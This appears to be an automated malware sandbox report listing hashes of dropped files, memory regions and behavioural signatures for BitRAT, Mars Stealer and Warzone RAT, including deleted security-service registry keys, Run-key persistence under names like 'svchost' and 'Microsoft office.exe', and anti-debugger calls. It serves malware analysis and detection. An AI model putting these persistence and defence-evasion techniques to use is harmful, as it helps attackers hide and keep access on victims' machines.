| SHA512 | 1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\AssocProvider.dll
| MD5 | 94dc379aa020d365ea5a32c4fab7f6a3 |
| SHA1 | 7270573fd7df3f3c996a772f85915e5982ad30a1 |
| SHA256 | dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907 |
| SHA512 | 998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\IBSProvider.dll
| MD5 | 120f0a2022f423fc9aadb630250f52c4 |
| SHA1 | 826df2b752c4f1bba60a77e2b2cf908dd01d3cf7 |
| SHA256 | 5425382aaa32ffc133adb6458ff516db0e2ad60fac52dd595d53c370f4ba6fa0 |
| SHA512 | 23e50735c06cef93d11873fc8e5e29fc63dcf3f01dc56822a17c11ca57bbfb10d46fac6351f84ba30050a16d6bd0744a08a4042a9743a6df87ac8a12e81e2764 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\ProvProvider.dll
| MD5 | 70c34975e700a9d7e120aaecf9d8f14b |
| SHA1 | e24d47f025c0ec0f60ec187bfc664e9347dc2c9c |
| SHA256 | a3e652c0bbe2082f2e0290da73485fb2c6e35c33ac60daa51a65f8c782dbd7a7 |
| SHA512 | 7f6a24345f5724d710e0b6c23b3b251e96d656fac58ea67b2b84d7d9a38d7723eae2c278e6e218e7f69f79d1cce240d91a8b0fd0d99960cacc65d82eb614a260 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\TransmogProvider.dll
| MD5 | 84ae9659e8d28c2bd19d45dbe32b6736 |
| SHA1 | 2a47058eafab4135a55575a359fbd22390788e93 |
| SHA256 | 943ea79ccbbb9790723f411720777af386acc03efab709ac2cbfeb7bd040a3e4 |
| SHA512 | d108a4a8699cd98576a5de9ce2f925697ece546fb441a76db6a922564ea70c54449cb1e8ac049a203979331c2c0ee7790d090ae5bb72d8d5e02786ef1cca530d |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\SysprepProvider.dll.mui
| MD5 | 93d076056dd01dfc64d95d4c552a2dff |
| SHA1 | a90fd06a62c6d63d87e00f5f7e9646b44d2c726a |
| SHA256 | 4389362a9dc662aa3c7a1d830498472bc586e00f0d269a8541975a34b03a1aa4 |
| SHA512 | b089574d4be0ccae205219c9e256de34c039081a547f05acfe4165d036b175de5d9676160effc3c19d87bbb41d0f415da598e507ed8f7b302cdbfdfb81f694ee |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\SysprepProvider.dll
| MD5 | 8bd67d87dbdcf881fb9c1f4f6bf83f46 |
| SHA1 | 10bd2e541b6a125c29f05958f496edf31ff9abb1 |
| SHA256 | f9b4d0afe87f434e8319556961b292ddc7d3a8c6fc06b8a08a50b5a96e28a204 |
| SHA512 | 258a4075a3149669ccd6ff602f71a721b195c9d15dea22d994d4d3e35cdf27beb0b8b8f5da8f52914f769642f89edbb1d9d857087778be713a874571a2ec6f89 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\SmiProvider.dll.mui
| MD5 | f32e38247d0b21476bbfb49989478f7e |
| SHA1 | b950fd72ea2a6a94ee049454df562aed79ca1e35 |
| SHA256 | a1a302e940f6d6718700737b787af7a2053ef68b5ea2ec61497e7ae2444c5835 |
| SHA512 | f483807d790a4bc3e68d6d1f986bd4a57b4a67c91fb3dbef88220a4b510f11d1190cdd98a857eb1937e921e668dff2bcb5e4a7df640b1f3639ce6d2239ff8106 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\SmiProvider.dll
| MD5 | ad7bbb62335f6dc36214d8c9fe1aaca0 |
| SHA1 | f03cb2db64c361d47a1c21f6d714e090d695b776 |
| SHA256 | ac1e7407317859981d253fd9d977e246a4d0da24572c45efe0ade1745376bffb |
| SHA512 | 4ad7132f0ad5a7228ec116c28d23ee9acfdbf4adf535b0b9995f2e7eec8776e652a0a18539c02b6f4b3e0c8fa2f75d5181577dec16993fa55cb971d7e82faac5 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\SetupPlatformProvider.dll.mui
| MD5 | 73e78fbbf6e6679fa643441c66628d37 |
| SHA1 | 57b70e6226c0cf3f8bc9a939f8b1ec411dedeff5 |
| SHA256 | 5d4dfc9bde18be1ec0b3834a65de6abab581e04c8c4f66ee14a62fb4b1b4cd06 |
| SHA512 | a045a6cdf9ca989b3ed9a50cda208affa17372f65b1d86e1bf4c10b5d5e3fee58c5d4b8ec0749a54e2e2156ed0e9776b59a8d3b78f062349873cb574ab3f77fa |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\SetupPlatformProvider.dll
| MD5 | 1ae66f4524911b2728201fff6776903c |
| SHA1 | 68bea62eb0f616af0729dbcbb80dc27de5816a83 |
| SHA256 | 367e73f97318b6663018a83a11019147e67b62ab83988730ebbda93984664dd3 |
| SHA512 | 7abf07d1338e08dc8b65b4f987eaff96d99aa46c892b5d2d79684ca7cf5f139d2634d9b990e5f6730f7f8a647e4fbb3d5905f9f2a5680250852671599f15ee69 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\ProvProvider.dll.mui
| MD5 | b8a8c6c4cd89eeda1e299c212dc9c198 |
| SHA1 | f88c8a563b20864e0fc6f3d63fadda507aa2e96e |
| SHA256 | 50ad19e21b6425d12aa57cd4656748877db1f147189ec44abb19ba90be8505ea |
| SHA512 | 4a6f0dac5b3b18e4942ce5f51b566ce3ba465baa43457384ee785d1c0e7c33f9b9396a143aac0398a34e4e2f7d704ba06d3cc68761fd3cb6f53f4043a906e475 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\OSProvider.dll.mui
| MD5 | 0633e0fccd477d9b22de4dd5a84abe53 |
| SHA1 | e04fb5c3acb35d128c1ea6ee6fb0e9b3fe90d5a9 |
| SHA256 | b6758aba17f6cd74923ca0976dd580222851ef6435cd16b3b2b04e85280ce706 |
| SHA512 | e95ed1d8069d6f200f0a2ea8dd7688404af9db9ce5e229afcb625a1f9eb46ac9e7a1c2c4c5ce156b190514415679e82e213732e8e890ed1a89af9026e4e73fe3 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\OfflineSetupProvider.dll.mui
| MD5 | 015271d46ab128a854a4e9d214ab8a43 |
| SHA1 | 2569deff96fb5ad6db924cee2e08a998ddc80b2a |
| SHA256 | 692744ce4bba1e82ad1a91ab97eec2bac7146bc995e8e8ed59bc2c7d366af7ec |
| SHA512 | 6ba678da0475a6b1872c2e2c151b395a4d97390bed4671d3f918aab5e69cbc9ceafe72c3100ba060ac6586fd37682499fdeef7d7b1ab10f5ec2411c1438ed438 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\OfflineSetupProvider.dll
| MD5 | 9cd7292cca75d278387d2bdfb940003c |
| SHA1 | bab579889ed3ac9cb0f124842c3e495cb2ec92ac |
| SHA256 | b38d322af8e614cc54299effd2164247c75bd7e68e0eb1a428376fcedaca9a6f |
| SHA512 | ebf96839e47bef9e240836b1d02065c703547a2424e05074467fe70f83c1ebf3db6cb71bf0d38848ec25e2e81b4cbb506ced7973b85e2ab2d8e4273de720779d |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\MsiProvider.dll.mui
| MD5 | c5e60ee2d8534f57fddb81ffce297763 |
| SHA1 | 78e6b0e03c8bf5802b3ef429b105d7ae3092a8f2 |
| SHA256 | 1ec7b04a8c25812db99abec82c7b7bf915ae3f7594c5d071231cafab9c1fa145 |
| SHA512 | ce654295e8b16da7bd004453ae4a422fe8296a8c2343e56d819883b835c391a02537ecf4d155a281a9d38f2291ee0004506b7fd48a99c0f8881ff1e38ae8ebcc |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\MsiProvider.dll
| MD5 | 9a760ddc9fdca758501faf7e6d9ec368 |
| SHA1 | 5d395ad119ceb41b776690f9085f508eaaddb263 |
| SHA256 | 7ff3939e1ef015da8c9577af4edfdd46f0029a2cfe4e3dac574d3175516e095f |
| SHA512 | 59d095246b62a7777e7d2d50c2474f4b633a1ae96056e4a4cb5265ccf7432fed0ea5df9b350f44d70b55a726241da10f228d8b5cbee9b0890c0b9dc9e810b139 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\LogProvider.dll.mui
| MD5 | 8933c8d708e5acf5a458824b19fd97da |
| SHA1 | de55756ddbeebc5ad9d3ce950acba5d2fb312331 |
| SHA256 | 6e51af7cfda6be5419f89d6705c44587556a4abffd388020d7f19e007e122cd6 |
| SHA512 | ead5017d9d024a1d7c53634ae725438ea3a34eed8c9056ebbc4ebe5aab2055c0e67687ce7608724e4f66f55aa486a63024967b76a5638cde3dd88b3d3432ca1f |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\IntlProvider.dll.mui
| MD5 | 2eb303db5753eb7a6bb3ab773eeabdcb |
| SHA1 | 44c6c38e6ae5f9ce9d7ca9d45a3cc3020b1353e4 |
| SHA256 | aa43b64db4fdcd89e56ba5309f3ba2ffac2663ba30514e87c160687f4314221f |
| SHA512 | df1c8cefed4b5ef5a47f9bc0c42776611b3af709938a0900db79c6c9f4fae21acbbb6c4b1cad3c5a2051b622fe7e6e01486d34622742a981623fed933f1b1427 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\IntlProvider.dll
| MD5 | 510e132215cef8d09be40402f355879b |
| SHA1 | cae8659f2d3fd54eb321a8f690267ba93d56c6f1 |
| SHA256 | 1bb39f3389aa4258a923fa265afa2279688e6cdb14ff771f1621a56b03ddcf52 |
| SHA512 | 2f7b2ec0e94738838f755759cd35e20ab2138b8eca023ee6ef630ab83a3de1bc0792f12ea0d722abe9a6953626cbddf8ba55ea32fc794d2df677a0625e498ab0 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\ImagingProvider.dll.mui
| MD5 | f2e2ba029f26341158420f3c4db9a68f |
| SHA1 | 1dee9d3dddb41460995ad8913ad701546be1e59d |
| SHA256 | 32d8c8fb9a746be209db5c3bdad14f361cf2bef8144c32e5af419c28efd35da3 |
| SHA512 | 3d45d7bcf21d5df56b516fc18f7dc1bf80e44258b0c810b199a7bc06047a547060956c9d79575b82d9b6992fb5fe64f5b0ef1e408363887ae81a64b6ff9fa03e |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\ImagingProvider.dll
| MD5 | 35e989a1df828378baa340f4e0b2dfcb |
| SHA1 | 59ecc73a0b3f55e43dace3b05ff339f24ec2c406 |
| SHA256 | 874137ee906f91285b9a018735683a0dd21bdeaf2e340cbc54296551ccf8be2d |
| SHA512 | c8d69e37c918881786a8fdab2a2c5d1632411b1f75082aeb3eb24a8ba5f93dcb39b3f4000e651f95452263525d98fd1d3cb834de93bed16fa6f92ef271c3a92a |
memory/3456-263-0x00000000745E0000-0x0000000074619000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\IBSProvider.dll.mui
| MD5 | d4b67a347900e29392613b5d86fe4ac2 |
| SHA1 | fb84756d11bfd638c4b49268b96d0007b26ba2fb |
| SHA256 | 4ccfe7883bce7785b1387ad3872230159899a5337d30a2f81a937b74bcbc4ce5 |
| SHA512 | af0a2a3f813e1adfff972285c9655f50ce6916caaeff5cb82f6c7d76491ffc9b365a47f19750fc02d7122182bf65aae79ed167886c33f202d5a781ab83d75662 |
memory/3456-264-0x00000000743A0000-0x00000000743D9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\GenericProvider.dll.mui
| MD5 | d6b02daf9583f640269b4d8b8496a5dd |
| SHA1 | e3bc2acd8e6a73b6530bc201902ab714e34b3182 |
| SHA256 | 9102fa05ed98d902bf6e95b74fdbb745399d4ce4536a29607b2156a0edfeddf0 |
| SHA512 | 189e87fcc2902e2a8e59773783d80a7d4dd5d2991bd291b0976cbd304f78bd225b353703735b84de41b5f59c37402db634c4acc805d73176cde75ca662efff50 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\GenericProvider.dll
| MD5 | ef7e2760c0a24453fc78359aea3d7869 |
| SHA1 | 0ea67f1fd29df2615da43e023e86046e8e46e2e1 |
| SHA256 | d39f38402a9309ddd1cba67be470ede348f2bc1bab2f8d565e8f15510761087a |
| SHA512 | be785ba6b564cc4e755b4044ae27f916c009b7d942fcd092aed2ae630b1704e8a2f8b4692648eed481a5eb5355fd2e1ef7f94f6fb519b7e1ff6fc3c5f1aaa06f |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\FolderProvider.dll.mui
| MD5 | 22b4a3a1ec3b6d7aa3bc61d0812dc85f |
| SHA1 | 97ae3504a29eb555632d124022d8406fc5b6f662 |
| SHA256 | c81a992ecebd9260ff34e41383aaca1c64a9fa4706a4744ac814f0f5daa1e105 |
| SHA512 | 9329b60a60c45b2486000ed0aff8d260fdac3d0a8789823eaa015eab1a6d577012f9d12502f81bad9902e41545c3c3e77f434bc1a753b4f8430d01db2cdbe26c |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\FolderProvider.dll
| MD5 | 4f3250ecb7a170a5eb18295aa768702d |
| SHA1 | 70eb14976ddab023f85bc778621ade1d4b5f4d9d |
| SHA256 | a235317ab7ed89e6530844a78b933d50f6f48ea5df481de158eb99dd8c4ba461 |
| SHA512 | e9ce6cced5029d931d82e78e7e609a892bfe239096b55062b78e8ff38cce34ce6dd4e91efb41c4cd6ecf6017d098e4c9b13d6cb4408d761051468ee7f74bc569 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\FfuProvider.dll.mui
| MD5 | dc826a9cb121e2142b670d0b10022e22 |
| SHA1 | b2fe459ede8ba99602ae6ea5fa24f0133cca2bc9 |
| SHA256 | ba6695148f96a5d45224324006ae29becfd2a6aa1de947e27371a4eb84e7451a |
| SHA512 | 038e9abff445848c882a71836574df0394e73690bc72642c2aa949c1ad820c5cbb4dedc4ee7b5b75fd5ac8a43813d416f23d28973de7a7f0e5c3f7112da6fe1b |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\FfuProvider.dll
| MD5 | df785c5e4aacaee3bd16642d91492815 |
| SHA1 | 286330d2ab07512e1f636b90613afcd6529ada1e |
| SHA256 | 56cc8d139be12e969fff3bbf47b1f5c62c3db887e3fb97c79cf7d285076f9271 |
| SHA512 | 3566de60fe76b63940cff3579da94f404c0bc713f2476ba00b9de12dc47973c7c22d5eed1fd667d20cea29b3c3c4fa648e5f44667e8369c192a4b69046e6f745 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\DmiProvider.dll.mui
| MD5 | b7252234aa43b7295bb62336adc1b85c |
| SHA1 | b2c42a5af79530e7cf9bcf54fd76ae9d5f234d7f |
| SHA256 | 73709c25dc5300a435e53df97fc01a7dc184b56796cae48ee728d54d26076d6c |
| SHA512 | 88241009b342eb1205b10f7725a7cb1ec2c7135606459d038c4b8847efd9d5e0ad4749621f8df93746dd3ba8ab92d1b0f513ed10e2ba712a7991716f4c062358 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DmiProvider.dll
| MD5 | ea8488990b95ce4ef6b4e210e0d963b2 |
| SHA1 | cd8bf723aa9690b8ca9a0215321e8148626a27d1 |
| SHA256 | 04f851b9d5e58ed002ad768bdcc475f22905fb1dab8341e9b3128df6eaa25b98 |
| SHA512 | 56562131cbe5f0ea5a2508f5bfed88f21413526f1539fe4864ece5b0e03a18513f3db33c07e7abd7b8aaffc34a7587952b96bb9990d9f4efa886f613d95a5b1b |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\dismprov.dll.mui
| MD5 | 7d06108999cc83eb3a23eadcebb547a5 |
| SHA1 | 200866d87a490d17f6f8b17b26225afeb6d39446 |
| SHA256 | cf8cc85cdd12cf4a02df5274f8d0cdc625c6409fe80866b3052b7d5a862ac311 |
| SHA512 | 9f024aa89392fbbbabe62a58857e5ad5250e05f23d7f78fc9a09f535463446796dd6e37aab5e38dfc0bf5b15533844f63b3bddcb5cb9335901e099f65f9d8002 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\DismCore.dll.mui
| MD5 | 7a15f6e845f0679de593c5896fe171f9 |
| SHA1 | 0c923dfaffb56b56cba0c28a4eacb66b1b91a1f4 |
| SHA256 | f91e3c35b472f95d7b1ae3dc83f9d6bfde33515aa29e8b310f55d9fe66466419 |
| SHA512 | 5a0373f1fb076a0059cac8f30fe415e06ed880795f84283911bec75de0977baf52432b740b429496999cedf5cca45efd6ef010700e2d9a1887438056c8c573ca |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\DismCore.dll
| MD5 | b1f793773dc727b4af1648d6d61f5602 |
| SHA1 | be7ed4e121c39989f2fb343558171ef8b5f7af68 |
| SHA256 | af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e |
| SHA512 | 66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\CbsProvider.dll.mui
| MD5 | 6c51a3187d2464c48cc8550b141e25c5 |
| SHA1 | a42e5ae0a3090b5ab4376058e506b111405d5508 |
| SHA256 | d7a0253d6586e7bbfb0acb6facd9a326b32ba1642b458f5b5ed27feccb4fc199 |
| SHA512 | 87a9e997d55bc6dbd05af1291fb78cd02266641d018ccfeb6826cb0de205aaf8a57b49e587462dbb6df2b86b54f91c0c5d3f87e64d7dbb2aea75ef143c5447ba |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\AssocProvider.dll.mui
| MD5 | 8833761572f0964bdc1bea6e1667f458 |
| SHA1 | 166260a12c3399a9aa298932862569756b4ecc45 |
| SHA256 | b18c6ce1558c9ef6942a3bce246a46557c2a7d12aec6c4a07e4fa84dd5c422f5 |
| SHA512 | 2a907354ec9a1920b9d1d2aeb9ff7c7314854b36a27f7d88aca17825e74a87413dbe7d1c3fde6a2410b5934f8c80a76f8bb6b7f12e7cfc643ce6622ca516d9b8 |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\en-US\AppxProvider.dll.mui
| MD5 | bd0dd9c5a602cb0ad7eabc16b3c1abfc |
| SHA1 | cede6e6a55d972c22da4bc9e0389759690e6b37f |
| SHA256 | 8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3 |
| SHA512 | 86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c |
C:\Users\Admin\AppData\Local\Temp\99D726CF-7458-4F4A-B313-AFAE17BC3273\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
memory/3456-265-0x00000000732A0000-0x00000000732D9000-memory.dmp
memory/3456-266-0x00000000732A0000-0x00000000732D9000-memory.dmp
memory/4288-267-0x0000000000400000-0x000000000043D000-memory.dmp
memory/3456-268-0x00000000745E0000-0x0000000074619000-memory.dmp
memory/3456-269-0x00000000743A0000-0x00000000743D9000-memory.dmp
memory/3456-270-0x00000000732A0000-0x00000000732D9000-memory.dmp
memory/3456-271-0x00000000732A0000-0x00000000732D9000-memory.dmp
memory/3456-272-0x00000000732A0000-0x00000000732D9000-memory.dmp
memory/3456-273-0x00000000732A0000-0x00000000732D9000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win7-20221111-en
Max time kernel
146s
Max time network
157s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security | C:\Windows\SysWOW64\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft.exe | N/A |
| N/A | N/A | C:\Program Files\Builded.exe | N/A |
| N/A | N/A | C:\Program Files\installerX32.exe | N/A |
| N/A | N/A | C:\Program Files\InstallerX64.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Stops running service(s)
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Program Files\\Microsoft.exe" | C:\Program Files\Microsoft.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Defender\MpCommu.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpRes.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpCom.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpSvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MsMpLics.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MSASCui.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpCmdRun.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpEvMsg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_7080183 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpRTP.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
